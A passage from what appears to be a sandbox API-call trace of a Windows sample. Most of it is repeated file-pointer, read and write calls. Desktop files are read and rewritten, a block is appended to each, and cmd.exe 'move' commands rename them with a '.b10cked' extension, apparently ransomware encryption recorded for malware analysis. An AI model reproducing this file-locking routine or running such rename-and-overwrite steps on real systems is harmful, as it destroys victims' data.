lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd74 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.491] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x88c [0228.491] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd74 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.492] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd74 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.493] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x6b9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x6b9, lpOverlapped=0x0) returned 1 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.493] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: 
lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x6b9, lpOverlapped=0x0) returned 1 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1721, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb [0228.493] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x6b9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x6b9, lpOverlapped=0x0) returned 1 [0228.493] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1721, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb [0228.493] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x6b9, lpOverlapped=0x0) returned 1 [0228.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Q--qnZ17d.bmp", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0228.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Q--qnZ17d.bmp", cchWideChar=13, lpMultiByteStr=0x131324c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q--qnZ17d.bmp", lpUsedDefaultChar=0x0) returned 13 [0228.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd74 [0228.498] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.498] CloseHandle (hObject=0x1b4) returned 1 [0228.499] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp", 
lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP") returned 0x33 [0228.500] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\") returned 0x27 [0228.500] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x308, dwThreadId=0x42c)) returned 1 [0228.502] CloseHandle (hObject=0x120) returned 1 [0228.502] CloseHandle (hObject=0x1b4) returned 1 [0228.502] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.502] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.502] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount1=39, 
lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 2 [0228.502] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.502] ReleaseMutex (hMutex=0xf8) returned 1 [0228.502] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.502] ReleaseMutex (hMutex=0xf8) returned 1 [0228.502] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.503] ReleaseMutex (hMutex=0xf8) returned 1 [0228.503] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.503] ReleaseMutex (hMutex=0xf8) returned 1 [0228.503] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28529246610) returned 1 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.504] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x61ac 
[0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.505] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x5cc4 [0228.505] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x61ac [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x61ac [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.506] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.507] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x30d5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x30d5, lpOverlapped=0x0) returned 1 [0228.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.507] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x30d5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x30d5, lpOverlapped=0x0) returned 1 [0228.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-12501, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x30d7 [0228.507] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x30d5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x30d5, lpOverlapped=0x0) returned 1 [0228.507] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-12501, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x30d7 [0228.507] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x30d5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x30d5, lpOverlapped=0x0) returned 1 [0228.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mPZFEDoY9Zi_en.flv", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0228.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mPZFEDoY9Zi_en.flv", cchWideChar=18, lpMultiByteStr=0x1328794, cbMultiByte=18, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mPZFEDoY9Zi_en.flv", lpUsedDefaultChar=0x0) returned 18 [0228.512] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x61ac [0228.512] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.512] CloseHandle (hObject=0x1b4) returned 1 [0228.513] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV") returned 0x25 [0228.513] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0228.513] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x930, dwThreadId=0xf98)) returned 1 [0228.614] CloseHandle (hObject=0x120) returned 1 [0228.615] CloseHandle 
